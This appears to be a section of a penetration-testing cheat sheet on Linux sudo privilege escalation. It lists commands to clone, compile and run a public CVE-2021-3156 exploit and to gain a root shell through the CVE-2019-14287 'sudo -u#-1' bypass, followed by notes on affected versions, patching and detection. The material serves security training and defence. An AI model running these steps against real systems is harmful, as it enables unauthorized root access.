22. SUDO

Check sudo version

sudo -V | head -n1

Check sudoers file (excluding comments and empty lines)

sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d'

Check OS version

cat /etc/lsb-release # or cat /etc/os-release

Clone exploit

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

Compile exploit

make

Run exploit (replace <target_id> with the appropriate target ID)

./sudo-hax-me-a-sandwich <target_id>

Verify root access

id
whoami

Check sudo privileges

sudo -l

Check user ID (if needed)

cat /etc/passwd | grep <username>

Run command as root

sudo -u#-1 id
sudo -u#-1 /bin/bash # or /bin/sh

Verify root access

id
whoami

1. CVE-2021-3156 (Heap-Based Buffer Overflow):

• Vulnerability:

  • Heap-based buffer overflow in sudo.

  • Affected versions: 1.8.31 (Ubuntu 20.04), 1.8.27 (Debian 10), 1.9.2 (Fedora 33), and others.

• Exploitation:

  • Requires a Proof-of-Concept (PoC) exploit.

  • Compile and run the exploit.

  • Select the appropriate target (OS version).

• Mitigation:

  • Update sudo to a patched version.

• Commands:

  • sudo -V (check sudo version)

  • git clone https://github.com/blasty/CVE-2021-3156.git

  • make

  • ./sudo-hax-me-a-sandwich <target_id>

  • cat /etc/lsb-release (check OS version)

2. CVE-2019-14287 (Sudo Policy Bypass):

• Vulnerability:

  • Allows bypassing sudo policy restrictions.

  • Affected sudo versions below 1.8.28.

  • Requires the user to be allowed to run a specific command via sudo.

• Exploitation:

  • Use sudo -u#-1 <command> to run a command as root.

  • -u#-1 is interpreted as -u0 (root).

• Mitigation:

  • Update sudo to a patched version.

• Commands:

  • sudo -l (check sudo privileges)

  • cat /etc/passwd | grep <username> (check user ID)

  • sudo -u#-1 id

Important Considerations and Enhancements:

• Vulnerability Severity:

  • Both vulnerabilities are critical.

  • They allow unprivileged users to gain root access.

• Patching:

  • Keeping sudo updated is essential.

• Sudo Configuration:

  • Properly configuring /etc/sudoers is crucial.

• Exploit Reliability:

  • PoC exploits may require adjustments for specific systems.

• Detection:

  • Monitor sudo logs for suspicious activity.

  • Use intrusion detection systems.

• Real world examples: Researching real world sudo exploits will help solidify understanding of the attack vectors.

• Sudoers file: more detail could be given about the syntax of the sudoers file.

• Nopasswd: More detail could be given about the security implications of the NOPASSWD flag in the sudoers file.